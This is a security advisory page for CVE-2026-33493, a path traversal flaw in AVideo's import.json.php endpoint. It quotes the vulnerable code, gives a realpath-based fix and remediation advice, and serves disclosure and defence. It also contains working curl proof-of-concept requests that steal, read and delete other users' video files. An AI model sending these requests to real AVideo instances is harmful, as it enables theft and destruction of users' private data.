Skip to main content

PHP CVE-2026-33493

HIGH
Path Traversal (CWE-22)
2026-03-20 https://github.com/WWBN/AVideo GHSA-83xq-8jxj-4rxm
7.1
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
7.1 HIGH
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
Low
Availability
None

Lifecycle Timeline

2
Analysis Generated
Mar 20, 2026 - 21:01 vuln.today
CVE Published
Mar 20, 2026 - 20:49 nvd
HIGH 7.1

DescriptionGitHub Advisory

Summary

The objects/import.json.php endpoint accepts a user-controlled fileURI POST parameter with only a regex check that the value ends in .mp4. Unlike objects/listFiles.json.php, which was hardened with a realpath() + directory prefix check to restrict paths to the videos/ directory, import.json.php performs no directory restriction. This allows an authenticated user with upload permission to: (1) steal any other user's private video files by importing them into their own account, (2) read .txt/.html/.htm files adjacent to any .mp4 file on the filesystem, and (3) delete .mp4 and adjacent text files if writable by the web server process.

Details

Missing path restriction in import.json.php

At objects/import.json.php:12, the only validation on the user-supplied fileURI is a regex ensuring it ends with .mp4:

php
// objects/import.json.php:12
if (!preg_match("/.*\\.mp4$/i", $_POST['fileURI'])) {
    return false;
}

Compare this to the hardened listFiles.json.php:16-28, which was patched to restrict paths:

php
// objects/listFiles.json.php:16-28
$allowedBase = realpath($global['systemRootPath'] . 'videos');
// ...
$resolvedPath = realpath($_POST['path']);
if ($resolvedPath === false || strpos($resolvedPath . '/', $allowedBase) !== 0) {
    http_response_code(403);
    echo json_encode(['error' => 'Path not allowed']);
    exit;
}

The same fix was never applied to import.json.php.

Attack Primitive 1: File content disclosure (.txt/.html/.htm)

At lines 23-43, the endpoint strips the .mp4 extension from fileURI and attempts to read adjacent .txt, .html, or .htm files via file_get_contents():

php
// objects/import.json.php:23-43
$filename = $obj->fileURI['dirname'] . DIRECTORY_SEPARATOR . $obj->fileURI['filename'];
$extensions = ['txt', 'html', 'htm'];
foreach ($extensions as $value) {
    if (file_exists("{$filename}.{$value}")) {
        $html = file_get_contents("{$filename}.{$value}");
        $_POST['description'] = $html;
        // ...
        break;
    }
}

The content flows into $_POST['description'], which is then saved as the video description by upload.php:59-64:

php
// view/mini-upload-form/upload.php:59-64
if (!empty($_POST['description'])) {
    // ...
    $video->setDescription($_POST['description']);
}

The attacker then views the imported video to read the file contents in the description field. This works for any path where both a .mp4 file and an adjacent .txt/.html/.htm file exist - which is the standard layout for every video in the videos/ directory.

Attack Primitive 2: Private video theft

At line 49, the endpoint copies the .mp4 file to a temp directory and then imports it as the current user's video:

php
// objects/import.json.php:47-49
$source = $obj->fileURI['dirname'] . DIRECTORY_SEPARATOR . $obj->fileURI['basename'];
if (!copy($source, $tmpFileName)) {
    // ...
}

An attacker who knows or can enumerate another user's video filename can copy any private .mp4 file into their own account.

Attack Primitive 3: File deletion

At lines 54-65, when $_POST['delete'] is set, the endpoint deletes the source .mp4 and adjacent text files:

php
// objects/import.json.php:54-61
if (!empty($_POST['delete']) && $_POST['delete'] !== 'false') {
    if (is_writable($source)) {
        unlink($source);
        foreach ($extensions as $value) {
            if (file_exists("{$filename}.{$value}")) {
                unlink("{$filename}.{$value}");
            }
        }
    }
}

PoC

Step 1: Steal a private video

Assuming the attacker knows another user's video filename (e.g., victim_video_abc123), which can be enumerated via the platform UI or API:

bash
curl -b 'PHPSESSID=<authenticated_session_with_upload_perm>' \
  -X POST 'https://target/objects/import.json.php' \
  -d 'fileURI=/var/www/html/AVideo/videos/victim_video_abc123/victim_video_abc123.mp4'

Expected result: The response returns {"error":false, "videos_id": <new_id>, ...}. The victim's private .mp4 is now imported as the attacker's own video at the returned videos_id.

Step 2: Read another user's video description file

bash
curl -b 'PHPSESSID=<authenticated_session_with_upload_perm>' \
  -X POST 'https://target/objects/import.json.php' \
  -d 'fileURI=/var/www/html/AVideo/videos/victim_video_abc123/victim_video_abc123.mp4&length=100'

Expected result: If victim_video_abc123.txt (or .html/.htm) exists alongside the .mp4, its contents are stored as the description of the newly created video. The attacker views the video page to read the exfiltrated content.

Step 3: Delete another user's video

bash
curl -b 'PHPSESSID=<authenticated_session_with_upload_perm>' \
  -X POST 'https://target/objects/import.json.php' \
  -d 'fileURI=/var/www/html/AVideo/videos/victim_video_abc123/victim_video_abc123.mp4&delete=true'

Expected result: The victim's .mp4 file and any adjacent .txt/.html/.htm files are deleted (if writable by the web server process).

Impact

  • Private video theft: Any authenticated user with upload permission can import another user's private videos into their own account, bypassing all access controls. This directly compromises video content confidentiality.
  • File content disclosure: .txt, .html, and .htm files adjacent to any .mp4 on the filesystem can be read by the attacker. Within the AVideo videos/ directory, these are video description files that may contain private information.
  • File deletion: An attacker can delete other users' video files and metadata, causing data loss.
  • Blast radius: All private videos on the instance are accessible to any user with upload permission. In default AVideo configurations, registered users can upload.

Recommended Fix

Apply the same realpath() + directory prefix check from listFiles.json.php to import.json.php, immediately after the .mp4 regex check:

php
// objects/import.json.php - add after line 14 (the preg_match check)
$allowedBase = realpath($global['systemRootPath'] . 'videos');
if ($allowedBase === false) {
    die(json_encode(['error' => 'Configuration error']));
}
$allowedBase .= '/';

$resolvedDir = realpath(dirname($_POST['fileURI']));
if ($resolvedDir === false || strpos($resolvedDir . '/', $allowedBase) !== 0) {
    http_response_code(403);
    die(json_encode(['error' => 'Path not allowed']));
}
// Reconstruct fileURI from resolved path to prevent symlink bypass
$_POST['fileURI'] = $resolvedDir . '/' . basename($_POST['fileURI']);

AnalysisAI

The AVideo platform contains a path traversal vulnerability in the objects/import.json.php endpoint that allows authenticated users with upload permissions to bypass directory restrictions and access any MP4 file on the filesystem. Attackers can steal private videos from other users, read adjacent text/HTML files containing video metadata, and delete video files if writable by the web server. A detailed proof-of-concept is publicly available in the GitHub security advisory, and the vulnerability affects all instances where authenticated users have upload permissions, which is the default configuration.

Technical ContextAI

This vulnerability affects the AVideo platform, specifically the objects/import.json.php endpoint (CPE pkg:composer/wwbn_avideo). The root cause is a CWE-22 path traversal flaw where user-supplied fileURI parameters are validated only with a regex check requiring .mp4 extension, without the realpath() and directory prefix validation that was previously applied to the listFiles.json.php endpoint. The PHP application uses file_get_contents() to read adjacent .txt/.html/.htm files and copy() to duplicate MP4 files without verifying the resolved canonical path falls within the intended videos directory. This allows directory traversal using absolute paths or relative path sequences to access files outside the sandboxed videos directory, bypassing application-level access controls entirely.

RemediationAI

Apply the security patch provided in the GitHub security advisory at https://github.com/WWBN/AVideo/security/advisories/GHSA-83xq-8jxj-4rxm which implements realpath() validation and directory prefix checking in objects/import.json.php matching the existing protection in listFiles.json.php. The recommended fix adds canonical path resolution to ensure the user-supplied fileURI resolves to a path within the allowed videos directory, rejecting any traversal attempts with HTTP 403. As an interim mitigation until patching, restrict upload permissions to only highly trusted administrators, implement strict input validation at the web application firewall layer to block traversal sequences, and monitor for suspicious fileURI parameters containing absolute paths or parent directory references in import.json.php requests. Organizations should also audit access logs for exploitation attempts using absolute paths in the fileURI parameter.

More in PHP

View all
CVE-2012-1823 CRITICAL POC
9.8 May 11

sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not

CVE-2016-1555 CRITICAL POC
9.8 Apr 21

(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear

CVE-2024-11680 CRITICAL POC
9.8 Nov 26

ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C

CVE-2025-49113 CRITICAL POC
9.9 Jun 02

Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au

CVE-2017-9841 CRITICAL POC
9.8 Jun 27

Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c

CVE-2025-0108 HIGH POC
8.8 Feb 12

Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers

CVE-2021-25298 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2021-25296 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2013-4983 CRITICAL POC
10.0 Sep 10

The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows

CVE-2023-6553 CRITICAL POC
9.8 Dec 15

The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1

CVE-2024-46506 CRITICAL POC
10.0 May 13

NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro

CVE-2024-8353 CRITICAL POC
9.8 Sep 28

The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all

Share

CVE-2026-33493 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy